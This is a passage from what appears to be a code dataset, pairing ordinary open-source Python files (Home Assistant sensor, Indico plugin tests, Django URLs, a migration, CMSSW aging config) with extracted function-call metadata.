jina.proto.jina_pb2 import EnvelopeProto\n'), ((64, 43, 64, 58), 'jina.proto.jina_pb2.EnvelopeProto', 'EnvelopeProto', ({}, {}), '()', False, 'from jina.proto.jina_pb2 import EnvelopeProto\n'), ((69, 22, 69, 32), 'jina.Document', 'Document', ({}, {}), '()', False, 'from jina import Request, QueryLang, Document\n'), ((75, 43, 75, 58), 'jina.proto.jina_pb2.EnvelopeProto', 'EnvelopeProto', ({}, {}), '()', False, 'from jina.proto.jina_pb2 import EnvelopeProto\n'), ((85, 43, 85, 58), 'jina.proto.jina_pb2.EnvelopeProto', 'EnvelopeProto', ({}, {}), '()', False, 'from jina.proto.jina_pb2 import EnvelopeProto\n'), ((128, 43, 128, 58), 'jina.proto.jina_pb2.EnvelopeProto', 'EnvelopeProto', ({}, {}), '()', False, 'from jina.proto.jina_pb2 import EnvelopeProto\n'), ((191, 22, 191, 32), 'jina.Document', 'Document', ({}, {}), '()', False, 'from jina import Request, QueryLang, Document\n'), ((192, 30, 192, 40), 'jina.Document', 'Document', ({}, {}), '()', False, 'from jina import Request, QueryLang, Document\n'), ((17, 87, 17, 102), 'tests.random_docs', 'random_docs', ({(17, 99, 17, 101): '(10)'}, {}), '(10)', False, 'from tests import random_docs\n'), ((29, 87, 29, 102), 'tests.random_docs', 'random_docs', ({(29, 99, 29, 101): '(10)'}, {}), '(10)', False, 'from tests import random_docs\n'), ((42, 87, 42, 102), 'tests.random_docs', 'random_docs', ({(42, 99, 42, 101): '(10)'}, {}), '(10)', False, 'from tests import random_docs\n'), ((53, 87, 53, 102), 'tests.random_docs', 'random_docs', ({(53, 99, 53, 101): '(10)'}, {}), '(10)', False, 'from tests import random_docs\n'), ((64, 87, 64, 102), 'tests.random_docs', 'random_docs', ({(64, 99, 64, 101): '(10)'}, {}), '(10)', False, 'from tests import random_docs\n'), ((75, 87, 75, 102), 'tests.random_docs', 'random_docs', ({(75, 99, 75, 101): '(10)'}, {}), '(10)', False, 'from tests import random_docs\n'), ((85, 87, 85, 102), 'tests.random_docs', 'random_docs', ({(85, 99, 85, 101): '(10)'}, {}), '(10)', False, 'from tests import random_docs\n'), ((96, 94, 96, 109), 'tests.random_docs', 'random_docs', ({(96, 106, 96, 108): '(10)'}, {}), '(10)', False, 'from tests import random_docs\n'), ((117, 71, 117, 86), 'tests.random_docs', 'random_docs', ({(117, 83, 117, 85): '(10)'}, {}), '(10)', False, 'from tests import random_docs\n'), ((128, 87, 128, 102), 'tests.random_docs', 'random_docs', ({(128, 99, 128, 101): '(10)'}, {}), '(10)', False, 'from tests import random_docs\n')]
MrMonk3y/vimrc
tabnine-vim/third_party/ycmd/ycmd/tests/python/testdata/project/settings_extra_conf.py
950230fb3fd7991d1234c2ab516ec03245945677
import os import sys DIR_OF_THIS_SCRIPT = os.path.abspath( os.path.dirname( __file__ ) ) def Settings( **kwargs ): return { 'interpreter_path': sys.executable, 'sys_path': [ os.path.join( DIR_OF_THIS_SCRIPT, 'third_party' ) ] }
[((4, 38, 4, 65), 'os.path.dirname', 'os.path.dirname', ({(4, 55, 4, 63): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((10, 18, 10, 67), 'os.path.join', 'os.path.join', ({(10, 32, 10, 50): 'DIR_OF_THIS_SCRIPT', (10, 52, 10, 65): '"""third_party"""'}, {}), "(DIR_OF_THIS_SCRIPT, 'third_party')", False, 'import os\n')]
Cloud-PG/smart-cache
SmartCache/sim/Utilities/setup.py
467987abece3fd4830fd615288046359761229f8
from distutils.core import setup setup( name='utils', version='1.0.0', author='Mirco Tracolli', author_email='[email protected]', packages=[ 'utils', ], scripts=[], url='https://github.com/Cloud-PG/smart-cache', license='Apache 2.0 License', description='Utils for the SmartCache project', long_description="To do...", install_requires=open("requirements.txt").read(), classifier=[ "Operating System :: POSIX :: Linux", "License :: OSI Approved :: Apache 2.0 License", "Programming Language :: Python :: 3 :: Only" ] )
[]
liangleslie/core
homeassistant/components/eight_sleep/binary_sensor.py
cc807b4d597daaaadc92df4a93c6e30da4f570c6
"""Support for Eight Sleep binary sensors.""" from __future__ import annotations import logging from pyeight.eight import EightSleep from homeassistant.components.binary_sensor import ( BinarySensorDeviceClass, BinarySensorEntity, ) from homeassistant.core import HomeAssistant from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType from homeassistant.helpers.update_coordinator import DataUpdateCoordinator from . import EightSleepBaseEntity from .const import DATA_API, DATA_HEAT, DOMAIN _LOGGER = logging.getLogger(__name__) async def async_setup_platform( hass: HomeAssistant, config: ConfigType, async_add_entities: AddEntitiesCallback, discovery_info: DiscoveryInfoType | None = None, ) -> None: """Set up the eight sleep binary sensor.""" if discovery_info is None: return eight: EightSleep = hass.data[DOMAIN][DATA_API] heat_coordinator: DataUpdateCoordinator = hass.data[DOMAIN][DATA_HEAT] entities = [] for user in eight.users.values(): entities.append( EightHeatSensor(heat_coordinator, eight, user.userid, "bed_presence") ) async_add_entities(entities) class EightHeatSensor(EightSleepBaseEntity, BinarySensorEntity): """Representation of a Eight Sleep heat-based sensor.""" _attr_device_class = BinarySensorDeviceClass.OCCUPANCY def __init__( self, coordinator: DataUpdateCoordinator, eight: EightSleep, user_id: str | None, sensor: str, ) -> None: """Initialize the sensor.""" super().__init__(coordinator, eight, user_id, sensor) assert self._user_obj _LOGGER.debug( "Presence Sensor: %s, Side: %s, User: %s", sensor, self._user_obj.side, user_id, ) @property def is_on(self) -> bool: """Return true if the binary sensor is on.""" assert self._user_obj return bool(self._user_obj.bed_presence)
[((20, 10, 20, 37), 'logging.getLogger', 'logging.getLogger', ({(20, 28, 20, 36): '__name__'}, {}), '(__name__)', False, 'import logging\n')]
bpedersen2/indico-plugins-cern
ravem/tests/util_test.py
c4f06d11d981c316fc8de2892758484deb58e2f5
# This file is part of the CERN Indico plugins. # Copyright (C) 2014 - 2022 CERN # # The CERN Indico plugins are free software; you can redistribute # them and/or modify them under the terms of the MIT License; see # the LICENSE file for more details. from unittest.mock import MagicMock import pytest from requests.exceptions import HTTPError, Timeout from indico.testing.util import extract_logs from indico_ravem.plugin import RavemPlugin from indico_ravem.util import has_access, ravem_api_call @pytest.mark.usefixtures('db') @pytest.mark.parametrize('method', ('get', 'post')) def test_correct_http_method(mocker, method): request = mocker.patch('indico_ravem.util.requests.request') response = MagicMock() response.json.return_value = {'result': 'test'} response.raise_for_status.return_value = False request.return_value = response ravem_api_call('test_endpoint', method=method, param1='test1', param2='test2') assert request.call_count == 1 assert request.call_args[0][0] == method @pytest.mark.usefixtures('db') def test_correct_auth_method(mocker): request = mocker.patch('indico_ravem.util.requests.request') response = MagicMock() response.json.return_value = {'result': 'test'} response.raise_for_status.return_value = False request.return_value = response token = 'foo' RavemPlugin.settings.set('access_token', token) ravem_api_call('test_endpoint', param1='test1', param2='test2') assert request.call_count == 1 assert 'Authorization' in request.call_args[1]['headers'] assert request.call_args[1]['headers']['Authorization'] == 'Bearer %s' % token @pytest.mark.usefixtures('db') def test_accepts_json(mocker): request = mocker.patch('indico_ravem.util.requests.request') response = MagicMock() response.json.return_value = {'result': 'test'} response.raise_for_status.return_value = False request.return_value = response ravem_api_call('test_endpoint', param1='test1', param2='test2') assert request.call_count == 1 assert request.call_args[1]['headers']['Accept'] == 'application/json' @pytest.mark.usefixtures('db') @pytest.mark.parametrize(('root_endpoint', 'endpoint', 'expected_url'), ( ('https://ravem.test/', 'final_endpoint', 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/', 'final_endpoint', 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/', 'final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), ('https://ravem.test', './final_endpoint', 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/', './final_endpoint', 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/', './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), ('https://ravem.test', 'sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/', 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), ('https://ravem.test/api/v2/', 'sub/final_endpoint', 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test', './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/', './sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), ('https://ravem.test/api/v2/', './sub/final_endpoint', 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test/', '', 'https://ravem.test/'), ('https://ravem.test/api/', '', 'https://ravem.test/api/'), ('https://ravem.test/api/v2/', '', 'https://ravem.test/api/v2/'), )) def test_correct_api_endpoint(mocker, root_endpoint, endpoint, expected_url): request = mocker.patch('indico_ravem.util.requests.request') response = MagicMock() response.json.return_value = {'result': 'test'} response.raise_for_status.return_value = False request.return_value = response RavemPlugin.settings.set('api_endpoint', root_endpoint) ravem_api_call(endpoint, param1='test1', param2='test2') assert request.call_count == 1 assert request.call_args[0][1] == expected_url @pytest.mark.usefixtures('db') @pytest.mark.parametrize('params', ( {}, {'p1': '1stparam'}, {'p1': '1stparam', 'p2': '2ndparam'} )) def test_params_generated(mocker, params): request = mocker.patch('indico_ravem.util.requests.request') response = MagicMock() response.json.return_value = {'result': 'test'} response.raise_for_status.return_value = False request.return_value = response ravem_api_call('test_endpoint', params=params) assert request.call_count == 1 assert request.call_args[1]['params'] == params @pytest.mark.usefixtures('db') def test_raises_timeout(mocker): request = mocker.patch('indico_ravem.util.requests.request') request.side_effect = Timeout('Timeout test error message', request=request) with pytest.raises(Timeout) as excinfo: ravem_api_call('test_endpoint') assert str(excinfo.value) == "Timeout while contacting the room." assert request.call_count == 1 @pytest.mark.usefixtures('db') @pytest.mark.parametrize(('method', 'params'), ( ('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2': '2ndparam'}) )) def test_unexpected_exception_is_logged(mocker, caplog, method, params): request = mocker.patch('indico_ravem.util.requests.request') request.side_effect = IndexError('this is unexpected') with pytest.raises(IndexError) as excinfo: ravem_api_call('test_endpoint', method=method, **params) assert str(excinfo.value) == 'this is unexpected' log = extract_logs(caplog, one=True, name='indico.plugin.ravem') assert log.message == "failed call: {} {} with {}: {}".format(method.upper(), 'test_endpoint', params, 'this is unexpected') assert request.call_count == 1 @pytest.mark.usefixtures('db') @pytest.mark.parametrize(('method', 'params'), ( ('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2': '2ndparam'}) )) def test_http_error_is_logged(mocker, caplog, method, params): request = mocker.patch('indico_ravem.util.requests.request') request.method = method.upper() request.url = RavemPlugin.settings.get('api_endpoint') + 'test_endpoint' response = MagicMock() response.raise_for_status.side_effect = HTTPError('Well this is embarrassing') response.request = request response.url = response.request.url request.return_value = response with pytest.raises(HTTPError) as excinfo: ravem_api_call('test_endpoint', method=method, **params) assert str(excinfo.value) == 'Well this is embarrassing' log = extract_logs(caplog, one=True, name='indico.plugin.ravem') assert log.message == '{} {} failed with {}'.format( method.upper(), RavemPlugin.settings.get('api_endpoint') + 'test_endpoint', 'Well this is embarrassing') assert request.call_count == 1 @pytest.mark.usefixtures('db') def test_unlinked_event_vc_room_has_no_access(): event_vc_room = MagicMock() event_vc_room.link_object = None assert not has_access(event_vc_room) @pytest.mark.usefixtures('db', 'request_context') def test_unlinked_room_has_no_access(mocker): session = mocker.patch('indico_ravem.util.session') session.user = 'Guinea Pig' event_vc_room = MagicMock() event_vc_room.link_object.room = None assert not has_access(event_vc_room) @pytest.mark.usefixtures('db', 'request_context') def test_check_if_current_user_is_room_owner(mocker): session = mocker.patch('indico_ravem.util.session') session.user = 'Guinea Pig' request = mocker.patch('indico_ravem.util.request') request.remote_addr = '111.222.123.123' retrieve_principal = mocker.patch('indico_ravem.util._retrieve_principal') retrieve_principal.side_effect = lambda x: session.user event_vc_room = MagicMock() event_vc_room.link_object.room.has_equipment = MagicMock(return_value=True) event_vc_room.link_object.room.get_attribute_value.return_value = request.remote_addr event_vc_room.vc_room.data.get.return_value = 'User:123' event_vc_room.event.can_manage.return_value = False assert has_access(event_vc_room) @pytest.mark.usefixtures('db', 'request_context') def test_check_if_current_user_can_modify(mocker): request = mocker.patch('indico_ravem.util.request') request.remote_addr = '111.222.123.123' session = mocker.patch('indico_ravem.util.session') session.user = 'Guinea Pig' mocker.patch('indico_ravem.util._retrieve_principal') event_vc_room = MagicMock() event_vc_room.link_object.room.has_equipment = MagicMock(return_value=True) event_vc_room.link_object.room.get_attribute_value.return_value = request.remote_addr event_vc_room.event.can_manage.return_value = True assert has_access(event_vc_room) event_vc_room.event.can_manage.assert_called_once_with(session.user)
[((19, 1, 19, 30), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(19, 25, 19, 29): '"""db"""'}, {}), "('db')", False, 'import pytest\n'), ((20, 1, 20, 51), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(20, 25, 20, 33): '"""method"""', (20, 35, 20, 50): "('get', 'post')"}, {}), "('method', ('get', 'post'))", False, 'import pytest\n'), ((34, 1, 34, 30), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(34, 25, 34, 29): '"""db"""'}, {}), "('db')", False, 'import pytest\n'), ((51, 1, 51, 30), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(51, 25, 51, 29): '"""db"""'}, {}), "('db')", False, 'import pytest\n'), ((65, 1, 65, 30), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(65, 25, 65, 29): '"""db"""'}, {}), "('db')", False, 'import pytest\n'), ((66, 1, 82, 2), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(66, 25, 66, 70): "('root_endpoint', 'endpoint', 'expected_url')", (66, 72, 82, 1): "(('https://ravem.test/', 'final_endpoint',\n 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/',\n 'final_endpoint', 'https://ravem.test/api/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'final_endpoint',\n 'https://ravem.test/api/v2/final_endpoint'), ('https://ravem.test',\n './final_endpoint', 'https://ravem.test/final_endpoint'), (\n 'https://ravem.test/api/', './final_endpoint',\n 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/',\n './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), (\n 'https://ravem.test', 'sub/final_endpoint',\n 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/',\n 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test',\n './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), (\n 'https://ravem.test/api/', './sub/final_endpoint',\n 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', './sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test/',\n '', 'https://ravem.test/'), ('https://ravem.test/api/', '',\n 'https://ravem.test/api/'), ('https://ravem.test/api/v2/', '',\n 'https://ravem.test/api/v2/'))"}, {}), "(('root_endpoint', 'endpoint', 'expected_url'), ((\n 'https://ravem.test/', 'final_endpoint',\n 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/',\n 'final_endpoint', 'https://ravem.test/api/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'final_endpoint',\n 'https://ravem.test/api/v2/final_endpoint'), ('https://ravem.test',\n './final_endpoint', 'https://ravem.test/final_endpoint'), (\n 'https://ravem.test/api/', './final_endpoint',\n 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/',\n './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), (\n 'https://ravem.test', 'sub/final_endpoint',\n 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/',\n 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test',\n './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), (\n 'https://ravem.test/api/', './sub/final_endpoint',\n 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', './sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test/',\n '', 'https://ravem.test/'), ('https://ravem.test/api/', '',\n 'https://ravem.test/api/'), ('https://ravem.test/api/v2/', '',\n 'https://ravem.test/api/v2/')))", False, 'import pytest\n'), ((97, 1, 97, 30), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(97, 25, 97, 29): '"""db"""'}, {}), "('db')", False, 'import pytest\n'), ((98, 1, 102, 2), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(98, 25, 98, 33): '"""params"""', (98, 35, 102, 1): "({}, {'p1': '1stparam'}, {'p1': '1stparam', 'p2': '2ndparam'})"}, {}), "('params', ({}, {'p1': '1stparam'}, {'p1':\n '1stparam', 'p2': '2ndparam'}))", False, 'import pytest\n'), ((116, 1, 116, 30), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(116, 25, 116, 29): '"""db"""'}, {}), "('db')", False, 'import pytest\n'), ((128, 1, 128, 30), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(128, 25, 128, 29): '"""db"""'}, {}), "('db')", False, 'import pytest\n'), ((129, 1, 136, 2), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(129, 25, 129, 45): "('method', 'params')", (129, 47, 136, 1): "(('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1':\n '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {\n 'p1': '1stparam', 'p2': '2ndparam'}))"}, {}), "(('method', 'params'), (('get', {}), ('post', {}), (\n 'get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1':\n '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2':\n '2ndparam'})))", False, 'import pytest\n'), ((151, 1, 151, 30), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(151, 25, 151, 29): '"""db"""'}, {}), "('db')", False, 'import pytest\n'), ((152, 1, 159, 2), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(152, 25, 152, 45): "('method', 'params')", (152, 47, 159, 1): "(('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1':\n '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {\n 'p1': '1stparam', 'p2': '2ndparam'}))"}, {}), "(('method', 'params'), (('get', {}), ('post', {}), (\n 'get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1':\n '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2':\n '2ndparam'})))", False, 'import pytest\n'), ((181, 1, 181, 30), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(181, 25, 181, 29): '"""db"""'}, {}), "('db')", False, 'import pytest\n'), ((189, 1, 189, 49), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(189, 25, 189, 29): '"""db"""', (189, 31, 189, 48): '"""request_context"""'}, {}), "('db', 'request_context')", False, 'import pytest\n'), ((200, 1, 200, 49), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(200, 25, 200, 29): '"""db"""', (200, 31, 200, 48): '"""request_context"""'}, {}), "('db', 'request_context')", False, 'import pytest\n'), ((218, 1, 218, 49), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(218, 25, 218, 29): '"""db"""', (218, 31, 218, 48): '"""request_context"""'}, {}), "('db', 'request_context')", False, 'import pytest\n'), ((23, 15, 23, 26), 'unittest.mock.MagicMock', 'MagicMock', ({}, {}), '()', False, 'from unittest.mock import MagicMock\n'), ((28, 4, 28, 82), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (), '', False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((37, 15, 37, 26), 'unittest.mock.MagicMock', 'MagicMock', ({}, {}), '()', False, 'from unittest.mock import MagicMock\n'), ((43, 4, 43, 51), 'indico_ravem.plugin.RavemPlugin.settings.set', 'RavemPlugin.settings.set', ({(43, 29, 43, 43): '"""access_token"""', (43, 45, 43, 50): 'token'}, {}), "('access_token', token)", False, 'from indico_ravem.plugin import RavemPlugin\n'), ((44, 4, 44, 67), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (), '', False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((54, 15, 54, 26), 'unittest.mock.MagicMock', 'MagicMock', ({}, {}), '()', False, 'from unittest.mock import MagicMock\n'), ((59, 4, 59, 67), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (), '', False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((85, 15, 85, 26), 'unittest.mock.MagicMock', 'MagicMock', ({}, {}), '()', False, 'from unittest.mock import MagicMock\n'), ((90, 4, 90, 59), 'indico_ravem.plugin.RavemPlugin.settings.set', 'RavemPlugin.settings.set', ({(90, 29, 90, 43): '"""api_endpoint"""', (90, 45, 90, 58): 'root_endpoint'}, {}), "('api_endpoint', root_endpoint)", False, 'from indico_ravem.plugin import RavemPlugin\n'), ((91, 4, 91, 60), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (), '', False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((105, 15, 105, 26), 'unittest.mock.MagicMock', 'MagicMock', ({}, {}), '()', False, 'from unittest.mock import MagicMock\n'), ((110, 4, 110, 50), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (), '', False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((119, 26, 119, 80), 'requests.exceptions.Timeout', 'Timeout', (), '', False, 'from requests.exceptions import HTTPError, Timeout\n'), ((145, 10, 145, 68), 'indico.testing.util.extract_logs', 'extract_logs', (), '', False, 'from indico.testing.util import extract_logs\n'), ((164, 15, 164, 26), 'unittest.mock.MagicMock', 'MagicMock', ({}, {}), '()', False, 'from unittest.mock import MagicMock\n'), ((165, 44, 165, 82), 'requests.exceptions.HTTPError', 'HTTPError', ({(165, 54, 165, 81): '"""Well this is embarrassing"""'}, {}), "('Well this is embarrassing')", False, 'from requests.exceptions import HTTPError, Timeout\n'), ((174, 10, 174, 68), 'indico.testing.util.extract_logs', 'extract_logs', (), '', False, 'from indico.testing.util import extract_logs\n'), ((183, 20, 183, 31), 'unittest.mock.MagicMock', 'MagicMock', ({}, {}), '()', False, 'from unittest.mock import MagicMock\n'), ((194, 20, 194, 31), 'unittest.mock.MagicMock', 'MagicMock', ({}, {}), '()', False, 'from unittest.mock import MagicMock\n'), ((209, 20, 209, 31), 'unittest.mock.MagicMock', 'MagicMock', ({}, {}), '()', False, 'from unittest.mock import MagicMock\n'), ((210, 51, 210, 79), 'unittest.mock.MagicMock', 'MagicMock', (), '', False, 'from unittest.mock import MagicMock\n'), ((215, 11, 215, 36), 'indico_ravem.util.has_access', 'has_access', ({(215, 22, 215, 35): 'event_vc_room'}, {}), '(event_vc_room)', False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((226, 20, 226, 31), 'unittest.mock.MagicMock', 'MagicMock', ({}, {}), '()', False, 'from unittest.mock import MagicMock\n'), ((227, 51, 227, 79), 'unittest.mock.MagicMock', 'MagicMock', (), '', False, 'from unittest.mock import MagicMock\n'), ((231, 11, 231, 36), 'indico_ravem.util.has_access', 'has_access', ({(231, 22, 231, 35): 'event_vc_room'}, {}), '(event_vc_room)', False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((121, 9, 121, 31), 'pytest.raises', 'pytest.raises', ({(121, 23, 121, 30): 'Timeout'}, {}), '(Timeout)', False, 'import pytest\n'), ((122, 8, 122, 39), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', ({(122, 23, 122, 38): '"""test_endpoint"""'}, {}), "('test_endpoint')", False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((141, 9, 141, 34), 'pytest.raises', 'pytest.raises', ({(141, 23, 141, 33): 'IndexError'}, {}), '(IndexError)', False, 'import pytest\n'), ((142, 8, 142, 64), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (), '', False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((163, 18, 163, 58), 'indico_ravem.plugin.RavemPlugin.settings.get', 'RavemPlugin.settings.get', ({(163, 43, 163, 57): '"""api_endpoint"""'}, {}), "('api_endpoint')", False, 'from indico_ravem.plugin import RavemPlugin\n'), ((170, 9, 170, 33), 'pytest.raises', 'pytest.raises', ({(170, 23, 170, 32): 'HTTPError'}, {}), '(HTTPError)', False, 'import pytest\n'), ((171, 8, 171, 64), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (), '', False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((186, 15, 186, 40), 'indico_ravem.util.has_access', 'has_access', ({(186, 26, 186, 39): 'event_vc_room'}, {}), '(event_vc_room)', False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((197, 15, 197, 40), 'indico_ravem.util.has_access', 'has_access', ({(197, 26, 197, 39): 'event_vc_room'}, {}), '(event_vc_room)', False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((176, 24, 176, 64), 'indico_ravem.plugin.RavemPlugin.settings.get', 'RavemPlugin.settings.get', ({(176, 49, 176, 63): '"""api_endpoint"""'}, {}), "('api_endpoint')", False, 'from indico_ravem.plugin import RavemPlugin\n')]
stormsha/StormOnline
apps/organization/urls.py
10983b7a9ee09958927731ee3fd74178d7534ff6
# _*_ coding: utf-8 _*_ # --------------------------- __author__ = 'StormSha' __date__ = '2018/3/28 18:01' # --------------------------- # -------------------------django---------------------- from django.conf.urls import url from .views import OrgView, AddUserAskView, OrgHomeView, OrgCourseView, OrgDescView, OrgTeacherView, AddFavView from .views import TeacherListView, TeacherDetailView urlpatterns = [ url(r'^list/$', OrgView.as_view(), name="org_list"), url(r'^add_ask/$', AddUserAskView.as_view(), name="add_ask"), url(r'^home/(?P<org_id>\d+)/$', OrgHomeView.as_view(), name="org_home"), url(r'^course/(?P<org_id>\d+)/$', OrgCourseView.as_view(), name="org_course"), url(r'^desc/(?P<org_id>\d+)/$', OrgDescView.as_view(), name="org_desc"), url(r'^org_teacher/(?P<org_id>\d+)/$', OrgTeacherView.as_view(), name="org_teacher"), # --------------机构收藏------------------------- url(r'^add_fav/$', AddFavView.as_view(), name="add_fav"), # -----------------------teacher------------------------------ url(r'^teacher/list/$', TeacherListView.as_view(), name="teacher_list"), url(r'^teacher/detail/(?P<teacher_id>\d+)/$', TeacherDetailView.as_view(), name="teacher_detail") ]
[]
priyamshah112/Project-Descripton-Blog
tech_project/lib/python2.7/site-packages/filer/migrations/0010_auto_20180414_2058.py
8e01016c6be79776c4f5ca75563fa3daa839e39e
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('filer', '0009_auto_20171220_1635'), ] operations = [ migrations.AlterField( model_name='image', name='file_ptr', field=models.OneToOneField(primary_key=True, serialize=False, related_name='filer_image_file', parent_link=True, to='filer.File', on_delete=django.db.models.deletion.CASCADE), ), ]
[((18, 18, 18, 186), 'django.db.models.OneToOneField', 'models.OneToOneField', (), '', False, 'from django.db import migrations, models\n')]
ckamtsikis/cmssw
SLHCUpgradeSimulations/Configuration/python/aging.py
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
import FWCore.ParameterSet.Config as cms # handle normal mixing or premixing def getHcalDigitizer(process): if hasattr(process,'mixData'): return process.mixData if hasattr(process,'mix') and hasattr(process.mix,'digitizers') and hasattr(process.mix.digitizers,'hcal'): return process.mix.digitizers.hcal return None def getHGCalDigitizer(process,section): if hasattr(process,'mix') and hasattr(process.mix,'digitizers'): if section == 'EE' and hasattr(process.mix.digitizers,'hgceeDigitizer'): return process.mix.digitizers.hgceeDigitizer elif section == 'FH' and hasattr(process.mix.digitizers,'hgchefrontDigitizer'): return process.mix.digitizers.hgchefrontDigitizer elif section == 'BH' and hasattr(process.mix.digitizers,'hgchebackDigitizer'): return process.mix.digitizers.hgchebackDigitizer elif section == 'HFNose' and hasattr(process.mix.digitizers,'hfnoseDigitizer'): return process.mix.digitizers.hfnoseDigitizer return None # change assumptions about lumi rate def setScenarioHLLHC(module,scenarioHLLHC): if scenarioHLLHC=="nominal": from CalibCalorimetry.HcalPlugins.HBHEDarkening_cff import _years_LHC, _years_HLLHC_nominal module.years = _years_LHC + _years_HLLHC_nominal elif scenarioHLLHC=="ultimate": from CalibCalorimetry.HcalPlugins.HBHEDarkening_cff import _years_LHC, _years_HLLHC_ultimate module.years = _years_LHC + _years_HLLHC_ultimate return module # turnon = True enables default, False disables # recalibration and darkening always together def ageHB(process,turnon,scenarioHLLHC): if turnon: from CalibCalorimetry.HcalPlugins.HBHEDarkening_cff import HBDarkeningEP process.HBDarkeningEP = HBDarkeningEP process.HBDarkeningEP = setScenarioHLLHC(process.HBDarkeningEP,scenarioHLLHC) hcaldigi = getHcalDigitizer(process) if hcaldigi is not None: hcaldigi.HBDarkening = cms.bool(turnon) if hasattr(process,'es_hardcode'): process.es_hardcode.HBRecalibration = cms.bool(turnon) return process def ageHE(process,turnon,scenarioHLLHC): if turnon: from CalibCalorimetry.HcalPlugins.HBHEDarkening_cff import HEDarkeningEP process.HEDarkeningEP = HEDarkeningEP process.HEDarkeningEP = 